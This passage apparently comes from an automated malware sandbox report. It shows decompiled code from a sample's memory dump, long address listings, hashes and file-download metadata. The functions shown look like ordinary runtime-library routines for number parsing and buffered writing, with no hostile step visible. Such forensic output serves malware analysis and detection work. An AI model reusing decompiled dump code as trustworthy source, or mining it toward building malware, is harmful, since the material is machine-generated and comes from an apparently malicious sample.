				signed int _t125;
				signed int _t129;
				signed int _t133;
				signed int _t135;
				void* _t141;
				void* _t143;
				signed char _t144;
				signed int _t145;
				signed int _t148;
				signed int _t149;
				intOrPtr* _t151;
				signed char _t153;
				signed int _t160;
				void* _t162;
				signed char _t163;
				void* _t167;
				signed int _t168;
				intOrPtr* _t171;
				signed int _t172;
				signed int _t173;
				signed int _t174;
				void* _t176;

				_t173 = __esi;
				_t167 = __edi;
				_t162 = __edx;
				_t151 = _a8;
				_t117 = _a4;
				_t148 = 0;
				if(_t151 != 0) {
					 *_t151 = _t117;
				}
				if(_t117 != _t148) {
					__eflags = _a12 - _t148;
					if(_a12 == _t148) {
						L7:
						_push(_t173);
						_push(_t167);
						_v20 = _t148;
						_v16 = _t148;
						_v5 =  *_t117;
						_t9 = _t117 + 1; // 0x1
						_t168 = _t9;
						while(1) {
							_t118 = _v5 & 0x000000ff;
							_t173 = _t173 | 0xffffffff;
							__eflags = _t118 - _t173;
							if(_t118 != _t173) {
								_t173 = _t118;
							}
							_t119 = E00900867();
							_t163 = 8;
							__eflags =  *(_t119 + _t173 * 2) & _t163;
							if(( *(_t119 + _t173 * 2) & _t163) == 0) {
								break;
							} else {
								goto L11;
							}
							do {
								L11:
								_t145 =  *_t168;
								_t168 = _t168 + 1;
								__eflags = _t145 - _v5;
							} while (_t145 == _v5);
							_v5 = _t145;
						}
						__eflags = _v5 - 0x2d;
						_v12 = _t168;
						if(_v5 != 0x2d) {
							__eflags = _v5 - 0x2b;
							if(_v5 != 0x2b) {
								L17:
								_t153 = 0x10;
								__eflags = _a12 - _t148;
								if(_a12 != _t148) {
									L24:
									__eflags = _a12 - _t153;
									if(_a12 != _t153) {
										L29:
										asm("cdq");
										_t169 = _a12;
										_v40 = _t163;
										_t121 = E008CF920(0xffffffff, 0xffffffff, _a12, _t163);
										_v36 = _t153;
										_v32 = _t148;
										_v28 = _t121;
										_v24 = _t163;
										while(1) {
											_t174 = _v5 & 0x000000ff;
											_t148 = _t148 | 0xffffffff;
											__eflags = _t174 - _t148;
											if(_t174 != _t148) {
												_t148 = _t174;
											}
											_t122 = E00900867();
											__eflags =  *(_t122 + _t148 * 2) & 0x00000004;
											if(( *(_t122 + _t148 * 2) & 0x00000004) == 0) {
												goto L34;
											}
											_t176 = _v5 - 0x30;
											L40:
											__eflags = _t176 - _a12;
											if(_t176 >= _a12) {
												L50:
												_t149 = _a16;
												_v12 = _v12 - 1;
												__eflags = _t149 & 0x00000008;
												if((_t149 & 0x00000008) != 0) {
													__eflags = _t149 & 0x00000004;
													if((_t149 & 0x00000004) != 0) {
														L66:
														 *0x9a92c4 = 0x22;
														__eflags = _t149 & 0x00000001;
														if((_t149 & 0x00000001) == 0) {
															__eflags = _t149 & 0x00000002;
															if((_t149 & 0x00000002) == 0) {
																_t104 =  &_v20;
																 *_t104 = _v20 | 0xffffffff;
																__eflags =  *_t104;
																_v16 = 0x7fffffff;
															} else {
																_v20 = _v20 & 0x00000000;
																_v16 = 0x80000000;
															}
														} else {
															_v20 = _v20 | 0xffffffff;
															_v16 = _v16 | 0xffffffff;
														}
														L71:
														_t124 = _a8;
														__eflags = _t124;
														if(_t124 != 0) {
															 *_t124 = _v12;
														}
														__eflags = _t149 & 0x00000002;
														if((_t149 & 0x00000002) != 0) {
															asm("adc ecx, 0x0");
															_v20 =  ~_v20;
															_v16 =  ~_v16;
														}
														_t125 = _v20;
														L76:
														return _t125;
													}
													__eflags = _t149 & 0x00000001;
													if((_t149 & 0x00000001) != 0) {
														goto L71;
													}
													_t129 = _t149 & 0x00000002;
													__eflags = _t129;
													if(_t129 == 0) {
														L62:
														__eflags = _t129;
														if(_t129 != 0) {
															goto L71;
														}
														__eflags = _v16 - 0x7fffffff;
														if(__eflags < 0) {
															goto L71;
														}
														if(__eflags > 0) {
															goto L66;
														}
														__eflags = _v20 - 0xffffffff;
														if(_v20 <= 0xffffffff) {
															goto L71;
														}
														goto L66;
													}
													__eflags = _v16 - 0x80000000;
													if(__eflags > 0) {
														goto L66;
													}
													if(__eflags < 0) {
														goto L62;
													}
													__eflags = _v20;
													if(_v20 > 0) {
														goto L66;
													}
													goto L62;
												}
												__eflags = _a8;
												if(_a8 != 0) {
													_v12 = _a4;
												}
												_v20 = 0;
												_v16 = 0;
												goto L71;
											}
											_t160 = _v16;
											_a16 = _a16 | 0x00000008;
											__eflags = _t160 - _v24;
											if(__eflags < 0) {
												L54:
												_t135 = E008EF1E0(_t169, _v40, _v20, _t160) + _t176;
												__eflags = _t135;
												asm("adc edx, ecx");
												_v20 = _t135;
												_v16 = _t163;
												L55:
												_v12 = _v12 + 1;
												_v5 =  *_v12;
												continue;
											}
											if(__eflags > 0) {
												L44:
												__eflags = _v20 - _v28;
												if(_v20 != _v28) {
													L49:
													_a16 = _a16 | 0x00000004;
													__eflags = _a8;
													if(_a8 != 0) {
														goto L55;
													}
													goto L50;
												}
												__eflags = _t160 - _v24;
												if(_t160 != _v24) {
													goto L49;
												}
												__eflags = 0 - _v32;
												if(__eflags < 0) {
													goto L54;
												}
												if(__eflags > 0) {
													goto L49;
												}
												__eflags = _t176 - _v36;
												if(_t176 <= _v36) {
													goto L54;
												}
												goto L49;
											}
											__eflags = _v20 - _v28;
											if(_v20 < _v28) {
												goto L54;
											}
											goto L44;
											L34:
											__eflags = _t174 - 0xffffffff;
											if(_t174 == 0xffffffff) {
												_t174 = _t174;
												__eflags = _t174;
											}
											_t123 = E00900867();
											__eflags =  *(_t123 + _t174 * 2) & 0x00000103;
											if(( *(_t123 + _t174 * 2) & 0x00000103) == 0) {
												goto L50;
											} else {
												__eflags = _v5 - 0x61 - 0x19;
												_t133 = _v5;
												if(_v5 - 0x61 <= 0x19) {
													_t133 = _t133 - 0x20;
													__eflags = _t133;
												}
												_t51 = _t133 - 0x37; // -44
												_t176 = _t51;
												goto L40;
											}
										}
									}
									__eflags = _v5 - 0x30;
									if(_v5 != 0x30) {
										goto L29;
									}
									_t141 =  *_t168;
									__eflags = _t141 - 0x78;
									if(_t141 == 0x78) {
										L28:
										_t171 = _t168 + 1;
										_t172 = _t171 + 1;
										__eflags = _t172;
										_v5 =  *_t171;
										_v12 = _t172;
										goto L29;
									}
									__eflags = _t141 - 0x58;
									if(_t141 != 0x58) {
										goto L29;
									}
									goto L28;
								}
								__eflags = _v5 - 0x30;
								if(_v5 == 0x30) {
									_t143 =  *_t168;
									__eflags = _t143 - 0x78;
									if(_t143 == 0x78) {
										L23:
										_a12 = _t153;
										goto L24;
									}
									__eflags = _t143 - 0x58;
									if(_t143 == 0x58) {
										goto L23;
									}
									_a12 = _t163;
									goto L29;
								}
								_a12 = 0xa;
								goto L29;
							}
							L16:
							_t144 =  *_t168;
							_t168 = _t168 + 1;
							__eflags = _t168;
							_v12 = _t168;
							_v5 = _t144;
							goto L17;
						}
						_a16 = _a16 | 0x00000002;
						goto L16;
					}
					__eflags = _a12 - 2;
					if(_a12 < 2) {
						goto L3;
					}
					__eflags = _a12 - 0x24;
					if(_a12 > 0x24) {
						goto L3;
					}
					goto L7;
				}
				L3:
				_push(_t148);
				_push(_t148);
				_push(_t148);
				_push(_t148);
				_push(_t148);
				E0094CECC(_t148, _t151, _t162, _t167, _t173);
				_t125 = 0;
				goto L76;
			}










































                                                                                                                                                        0x00975cfa
                                                                                                                                                        0x00975cfa
                                                                                                                                                        0x00975cfa
                                                                                                                                                        0x00975cff
                                                                                                                                                        0x00975d02
                                                                                                                                                        0x00975d09
                                                                                                                                                        0x00975d0d
                                                                                                                                                        0x00975d0f
                                                                                                                                                        0x00975d0f
                                                                                                                                                        0x00975d13
                                                                                                                                                        0x00975d2b
                                                                                                                                                        0x00975d2e
                                                                                                                                                        0x00975d3c
                                                                                                                                                        0x00975d3e
                                                                                                                                                        0x00975d3f
                                                                                                                                                        0x00975d40
                                                                                                                                                        0x00975d43
                                                                                                                                                        0x00975d46
                                                                                                                                                        0x00975d49
                                                                                                                                                        0x00975d49
                                                                                                                                                        0x00975d4c
                                                                                                                                                        0x00975d4c
                                                                                                                                                        0x00975d50
                                                                                                                                                        0x00975d53
                                                                                                                                                        0x00975d55
                                                                                                                                                        0x00975d57
                                                                                                                                                        0x00975d57
                                                                                                                                                        0x00975d59
                                                                                                                                                        0x00975d60
                                                                                                                                                        0x00975d61
                                                                                                                                                        0x00975d64
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00975d66
                                                                                                                                                        0x00975d66
                                                                                                                                                        0x00975d66
                                                                                                                                                        0x00975d68
                                                                                                                                                        0x00975d69
                                                                                                                                                        0x00975d69
                                                                                                                                                        0x00975d6e
                                                                                                                                                        0x00975d6e
                                                                                                                                                        0x00975d73
                                                                                                                                                        0x00975d77
                                                                                                                                                        0x00975d7a
                                                                                                                                                        0x00975d82
                                                                                                                                                        0x00975d86
                                                                                                                                                        0x00975d91
                                                                                                                                                        0x00975d93
                                                                                                                                                        0x00975d94
                                                                                                                                                        0x00975d97
                                                                                                                                                        0x00975dba
                                                                                                                                                        0x00975dba
                                                                                                                                                        0x00975dbd
                                                                                                                                                        0x00975dd9
                                                                                                                                                        0x00975ddc
                                                                                                                                                        0x00975dde
                                                                                                                                                        0x00975de5
                                                                                                                                                        0x00975de8
                                                                                                                                                        0x00975ded
                                                                                                                                                        0x00975df0
                                                                                                                                                        0x00975df3
                                                                                                                                                        0x00975df6
                                                                                                                                                        0x00975df9
                                                                                                                                                        0x00975df9
                                                                                                                                                        0x00975dfd
                                                                                                                                                        0x00975e00
                                                                                                                                                        0x00975e02
                                                                                                                                                        0x00975e04
                                                                                                                                                        0x00975e04
                                                                                                                                                        0x00975e06
                                                                                                                                                        0x00975e0b
                                                                                                                                                        0x00975e0f
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00975e15
                                                                                                                                                        0x00975e44
                                                                                                                                                        0x00975e44
                                                                                                                                                        0x00975e47
                                                                                                                                                        0x00975e84
                                                                                                                                                        0x00975e84
                                                                                                                                                        0x00975e87
                                                                                                                                                        0x00975e8c
                                                                                                                                                        0x00975e8f
                                                                                                                                                        0x00975edc
                                                                                                                                                        0x00975edf
                                                                                                                                                        0x00975f0b
                                                                                                                                                        0x00975f0b
                                                                                                                                                        0x00975f15
                                                                                                                                                        0x00975f18
                                                                                                                                                        0x00975f24
                                                                                                                                                        0x00975f27
                                                                                                                                                        0x00975f32
                                                                                                                                                        0x00975f32
                                                                                                                                                        0x00975f32
                                                                                                                                                        0x00975f36
                                                                                                                                                        0x00975f29
                                                                                                                                                        0x00975f29
                                                                                                                                                        0x00975f2d
                                                                                                                                                        0x00975f2d
                                                                                                                                                        0x00975f1a
                                                                                                                                                        0x00975f1a
                                                                                                                                                        0x00975f1e
                                                                                                                                                        0x00975f1e
                                                                                                                                                        0x00975f39
                                                                                                                                                        0x00975f39
                                                                                                                                                        0x00975f3c
                                                                                                                                                        0x00975f3e
                                                                                                                                                        0x00975f43
                                                                                                                                                        0x00975f43
                                                                                                                                                        0x00975f45
                                                                                                                                                        0x00975f48
                                                                                                                                                        0x00975f52
                                                                                                                                                        0x00975f57
                                                                                                                                                        0x00975f5a
                                                                                                                                                        0x00975f5a
                                                                                                                                                        0x00975f5d
                                                                                                                                                        0x00975f63
                                                                                                                                                        0x00975f65
                                                                                                                                                        0x00975f65
                                                                                                                                                        0x00975ee1
                                                                                                                                                        0x00975ee4
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00975ee8
                                                                                                                                                        0x00975ee8
                                                                                                                                                        0x00975eeb
                                                                                                                                                        0x00975efa
                                                                                                                                                        0x00975efa
                                                                                                                                                        0x00975efc
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00975efe
                                                                                                                                                        0x00975f01
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00975f03
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00975f05
                                                                                                                                                        0x00975f09
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00975f09
                                                                                                                                                        0x00975eed
                                                                                                                                                        0x00975ef0
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00975ef2
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00975ef4
                                                                                                                                                        0x00975ef8
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00975ef8
                                                                                                                                                        0x00975e93
                                                                                                                                                        0x00975e96
                                                                                                                                                        0x00975e9b
                                                                                                                                                        0x00975e9b
                                                                                                                                                        0x00975e9e
                                                                                                                                                        0x00975ea1
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00975ea1
                                                                                                                                                        0x00975e49
                                                                                                                                                        0x00975e4c
                                                                                                                                                        0x00975e50
                                                                                                                                                        0x00975e53
                                                                                                                                                        0x00975ea9
                                                                                                                                                        0x00975eb8
                                                                                                                                                        0x00975eb8
                                                                                                                                                        0x00975eba
                                                                                                                                                        0x00975ebc
                                                                                                                                                        0x00975ebf
                                                                                                                                                        0x00975ec2
                                                                                                                                                        0x00975ec7
                                                                                                                                                        0x00975eca
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00975eca
                                                                                                                                                        0x00975e55
                                                                                                                                                        0x00975e5f
                                                                                                                                                        0x00975e62
                                                                                                                                                        0x00975e65
                                                                                                                                                        0x00975e7a
                                                                                                                                                        0x00975e7a
                                                                                                                                                        0x00975e7e
                                                                                                                                                        0x00975e82
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00975e82
                                                                                                                                                        0x00975e67
                                                                                                                                                        0x00975e6a
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00975e6e
                                                                                                                                                        0x00975e71
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00975e73
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00975e75
                                                                                                                                                        0x00975e78
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00975e78
                                                                                                                                                        0x00975e5a
                                                                                                                                                        0x00975e5d
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00975e1a
                                                                                                                                                        0x00975e1a
                                                                                                                                                        0x00975e1d
                                                                                                                                                        0x00975e1f
                                                                                                                                                        0x00975e1f
                                                                                                                                                        0x00975e1f
                                                                                                                                                        0x00975e21
                                                                                                                                                        0x00975e2b
                                                                                                                                                        0x00975e2f
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00975e31
                                                                                                                                                        0x00975e36
                                                                                                                                                        0x00975e38
                                                                                                                                                        0x00975e3c
                                                                                                                                                        0x00975e3e
                                                                                                                                                        0x00975e3e
                                                                                                                                                        0x00975e3e
                                                                                                                                                        0x00975e41
                                                                                                                                                        0x00975e41
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00975e41
                                                                                                                                                        0x00975e2f
                                                                                                                                                        0x00975df9
                                                                                                                                                        0x00975dbf
                                                                                                                                                        0x00975dc3
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00975dc5
                                                                                                                                                        0x00975dc7
                                                                                                                                                        0x00975dc9
                                                                                                                                                        0x00975dcf
                                                                                                                                                        0x00975dcf
                                                                                                                                                        0x00975dd2
                                                                                                                                                        0x00975dd2
                                                                                                                                                        0x00975dd3
                                                                                                                                                        0x00975dd6
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00975dd6
                                                                                                                                                        0x00975dcb
                                                                                                                                                        0x00975dcd
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00975dcd
                                                                                                                                                        0x00975d99
                                                                                                                                                        0x00975d9d
                                                                                                                                                        0x00975da8
                                                                                                                                                        0x00975daa
                                                                                                                                                        0x00975dac
                                                                                                                                                        0x00975db7
                                                                                                                                                        0x00975db7
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00975db7
                                                                                                                                                        0x00975dae
                                                                                                                                                        0x00975db0
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00975db2
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00975db2
                                                                                                                                                        0x00975d9f
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00975d9f
                                                                                                                                                        0x00975d88
                                                                                                                                                        0x00975d88
                                                                                                                                                        0x00975d8a
                                                                                                                                                        0x00975d8a
                                                                                                                                                        0x00975d8b
                                                                                                                                                        0x00975d8e
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00975d8e
                                                                                                                                                        0x00975d7c
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00975d7c
                                                                                                                                                        0x00975d30
                                                                                                                                                        0x00975d34
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00975d36
                                                                                                                                                        0x00975d3a
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00975d3a
                                                                                                                                                        0x00975d15
                                                                                                                                                        0x00975d15
                                                                                                                                                        0x00975d16
                                                                                                                                                        0x00975d17
                                                                                                                                                        0x00975d18
                                                                                                                                                        0x00975d19
                                                                                                                                                        0x00975d1a
                                                                                                                                                        0x00975d22
                                                                                                                                                        0x00000000

                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2152022479.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                                        • Associated: 00000006.00000002.2152010678.00000000008A0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152322375.0000000000990000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152327355.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152332352.00000000009A4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152336391.00000000009A7000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152340781.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152389742.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __aulldvrm
                                                                                                                                                        • String ID: $$0
                                                                                                                                                        • API String ID: 1302938615-389342756
                                                                                                                                                        • Opcode ID: 1407763334a16120dfe45bff2d65f069755870e5c5d3906492eafbf049ff66e8
                                                                                                                                                        • Instruction ID: b4af61a3e16e0a5ce74abc1b0a8241f57d4b26265c915f8af119a8b66fa8f2c3
                                                                                                                                                        • Opcode Fuzzy Hash: 1407763334a16120dfe45bff2d65f069755870e5c5d3906492eafbf049ff66e8
                                                                                                                                                        • Instruction Fuzzy Hash: B591C032D04A8AAFDF64CF98C4453EDBBB5BF41310F16855AD8A9A72D1C7B44A41CB40
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0097C371, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 127COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 86%
                                                                                                                                                        			E0097C371(void* __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8, short _a12) {
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				char _v24;
				intOrPtr _t57;
				short _t58;
				intOrPtr _t61;
				signed char _t63;
				signed int _t65;
				signed int _t74;
				signed int _t75;
				intOrPtr* _t76;
				signed int _t80;
				signed int _t82;
				intOrPtr _t87;
				signed int _t89;
				signed int _t90;
				intOrPtr* _t91;
				signed int _t93;
				signed int _t94;
				intOrPtr _t97;

				_t87 = __edx;
				_v16 = _v16 & 0x00000000;
				_v8 = _v8 & 0x00000000;
				_t80 = _a8;
				_t57 =  *((intOrPtr*)(_t80 + 4));
				if(_t57 <= 0) {
					_t57 =  *((intOrPtr*)(_t80 + 8));
				}
				_t97 = _a4;
				 *((intOrPtr*)(_t80 + 0x30)) = _t57;
				_t89 =  *((intOrPtr*)(_t97 + 0x80));
				_t58 = _a12;
				_a8 = _t89;
				if(_t57 != 0x48 || _t58 == 1) {
					 *((short*)(_t80 + 0x34)) = _t58;
					 *((intOrPtr*)(_t80 + 0x10)) = E0097BCFC();
					 *((intOrPtr*)(_t80 + 0x14)) = _t87;
					__eflags =  *(_t97 + 0x5c);
					if( *(_t97 + 0x5c) == 0) {
						goto L25;
					}
					_t61 =  *((intOrPtr*)(_t80 + 0x30));
					__eflags = _t61 - _t89;
					if(_t61 < _t89) {
						_t78 = _t61 + _t80;
						__eflags = _t61 + _t80;
						E008CDFC0(_t78, 0xff, _t89 - _t61);
					}
					_t90 =  *(_t97 + 0xcc);
					_t63 = _t90 >> 3;
					__eflags = _t63 & 0x00000001;
					if((_t63 & 0x00000001) != 0) {
						_v16 = 2;
					}
					_t82 =  *(_t97 + 0xc8);
					__eflags = _t82;
					if(_t82 <= 0) {
						L18:
						_push(0);
						_t91 = _t97 + 0xf0;
						_push(_t91);
						_push(_a8);
						_push(_t80);
						_push( &_v24);
						_push(0);
						_push(0);
						_push(0);
						_t65 = E008BF938( *(_t97 + 0x5c));
						_v8 = _t65;
						__eflags = _t65;
						if(_t65 < 0) {
							__eflags = _t65 - 0x80000022;
							if(_t65 == 0x80000022) {
								goto L25;
							}
							__eflags = _v8 - 2;
							if(_v8 == 2) {
								goto L25;
							}
							goto L24;
						}
						 *_t91 =  *_t91 + _a8;
						asm("adc dword [edi+0x4], 0x0");
						 *((intOrPtr*)(_t97 + 0x100)) =  *((intOrPtr*)(_t97 + 0x100)) + 1;
						 *((intOrPtr*)(_t97 + 0xd8)) =  *((intOrPtr*)(_t97 + 0xd8)) + 1;
						goto L25;
					} else {
						asm("sbb eax, eax");
						asm("cdq");
						_v12 = E008EF1E0(( ~(_t90 & 0x00002000) & 0xfff00400) + 0x100000, _t87, _t82, 0);
						_t74 =  *((intOrPtr*)(_t97 + 0xd8)) + _v16;
						_t75 = _t74 * _a8;
						__eflags = _t74 * _a8 >> 0x20 - _t87;
						if(__eflags < 0) {
							goto L18;
						}
						if(__eflags > 0) {
							L14:
							_t93 = (_t90 & 0x0000000b) - 1;
							__eflags = _t93;
							if(_t93 == 0) {
								_v8 = 0xc0000188;
								L24:
								_t54 = _t97 + 0xfc;
								 *_t54 =  *(_t97 + 0xfc) + 1;
								__eflags =  *_t54;
								goto L25;
							}
							_t94 = _t93 - 1;
							__eflags = _t94;
							if(_t94 == 0) {
								_t76 = _t97 + 0xe8;
								 *((intOrPtr*)(_t97 + 0xf0)) =  *_t76;
								_t86 =  *((intOrPtr*)(_t76 + 4));
								 *((intOrPtr*)(_t97 + 0xf4)) =  *((intOrPtr*)(_t76 + 4));
								 *((intOrPtr*)(_t97 + 0xd8)) = E00904FC0( *_t76, _t86,  *((intOrPtr*)(_t97 + 0x80)), 0);
							} else {
								__eflags = _t94 == 6;
								if(_t94 == 6) {
									_t34 = _t97 + 0xd4;
									 *_t34 =  *(_t97 + 0xd4) | 0x00000001;
									__eflags =  *_t34;
								}
							}
							goto L18;
						}
						__eflags = _t75 - _v12;
						if(_t75 < _v12) {
							goto L18;
						}
						goto L14;
					}
				} else {
					_v8 = 0x80000022;
					L25:
					return _v8;
				}
			}
























                                                                                                                                                        0x0097c371
                                                                                                                                                        0x0097c379
                                                                                                                                                        0x0097c37d
                                                                                                                                                        0x0097c382
                                                                                                                                                        0x0097c385
                                                                                                                                                        0x0097c38c
                                                                                                                                                        0x0097c38e
                                                                                                                                                        0x0097c38e
                                                                                                                                                        0x0097c391
                                                                                                                                                        0x0097c394
                                                                                                                                                        0x0097c397
                                                                                                                                                        0x0097c3a0
                                                                                                                                                        0x0097c3a4
                                                                                                                                                        0x0097c3a7
                                                                                                                                                        0x0097c3bb
                                                                                                                                                        0x0097c3c4
                                                                                                                                                        0x0097c3c7
                                                                                                                                                        0x0097c3ca
                                                                                                                                                        0x0097c3ce
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0097c3d4
                                                                                                                                                        0x0097c3d7
                                                                                                                                                        0x0097c3d9
                                                                                                                                                        0x0097c3de
                                                                                                                                                        0x0097c3de
                                                                                                                                                        0x0097c3e6
                                                                                                                                                        0x0097c3eb
                                                                                                                                                        0x0097c3ee
                                                                                                                                                        0x0097c3f6
                                                                                                                                                        0x0097c3f9
                                                                                                                                                        0x0097c3fb
                                                                                                                                                        0x0097c3fd
                                                                                                                                                        0x0097c3fd
                                                                                                                                                        0x0097c404
                                                                                                                                                        0x0097c40a
                                                                                                                                                        0x0097c40c
                                                                                                                                                        0x0097c45f
                                                                                                                                                        0x0097c461
                                                                                                                                                        0x0097c462
                                                                                                                                                        0x0097c468
                                                                                                                                                        0x0097c469
                                                                                                                                                        0x0097c46f
                                                                                                                                                        0x0097c470
                                                                                                                                                        0x0097c471
                                                                                                                                                        0x0097c472
                                                                                                                                                        0x0097c473
                                                                                                                                                        0x0097c477
                                                                                                                                                        0x0097c47c
                                                                                                                                                        0x0097c47f
                                                                                                                                                        0x0097c481
                                                                                                                                                        0x0097c4d2
                                                                                                                                                        0x0097c4d7
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0097c4d9
                                                                                                                                                        0x0097c4dd
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0097c4dd
                                                                                                                                                        0x0097c486
                                                                                                                                                        0x0097c488
                                                                                                                                                        0x0097c48c
                                                                                                                                                        0x0097c492
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0097c40e
                                                                                                                                                        0x0097c417
                                                                                                                                                        0x0097c425
                                                                                                                                                        0x0097c42e
                                                                                                                                                        0x0097c437
                                                                                                                                                        0x0097c43c
                                                                                                                                                        0x0097c43f
                                                                                                                                                        0x0097c441
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0097c443
                                                                                                                                                        0x0097c44a
                                                                                                                                                        0x0097c44d
                                                                                                                                                        0x0097c44d
                                                                                                                                                        0x0097c44e
                                                                                                                                                        0x0097c4c9
                                                                                                                                                        0x0097c4df
                                                                                                                                                        0x0097c4df
                                                                                                                                                        0x0097c4df
                                                                                                                                                        0x0097c4df
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0097c4df
                                                                                                                                                        0x0097c450
                                                                                                                                                        0x0097c450
                                                                                                                                                        0x0097c451
                                                                                                                                                        0x0097c49a
                                                                                                                                                        0x0097c4aa
                                                                                                                                                        0x0097c4b0
                                                                                                                                                        0x0097c4b6
                                                                                                                                                        0x0097c4c1
                                                                                                                                                        0x0097c453
                                                                                                                                                        0x0097c453
                                                                                                                                                        0x0097c456
                                                                                                                                                        0x0097c458
                                                                                                                                                        0x0097c458
                                                                                                                                                        0x0097c458
                                                                                                                                                        0x0097c458
                                                                                                                                                        0x0097c456
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0097c451
                                                                                                                                                        0x0097c445
                                                                                                                                                        0x0097c448
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0097c448
                                                                                                                                                        0x0097c3af
                                                                                                                                                        0x0097c3af
                                                                                                                                                        0x0097c4e5
                                                                                                                                                        0x0097c4ec
                                                                                                                                                        0x0097c4ec

                                                                                                                                                        APIs
                                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0097C4BC
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2152022479.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                                        • Associated: 00000006.00000002.2152010678.00000000008A0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152322375.0000000000990000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152327355.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152332352.00000000009A4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152336391.00000000009A7000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152340781.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152389742.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                        • String ID: "$409
                                                                                                                                                        • API String ID: 885266447-4048699559
                                                                                                                                                        • Opcode ID: 21b0ad0dda1a5bf92bd42300e84133f5eed5dd667f43441593c7c56666070728
                                                                                                                                                        • Instruction ID: b4ca74dd8bf72a59c8c96fdccf03a962acd6012227abaaae28dcf27ac322c8a1
                                                                                                                                                        • Opcode Fuzzy Hash: 21b0ad0dda1a5bf92bd42300e84133f5eed5dd667f43441593c7c56666070728
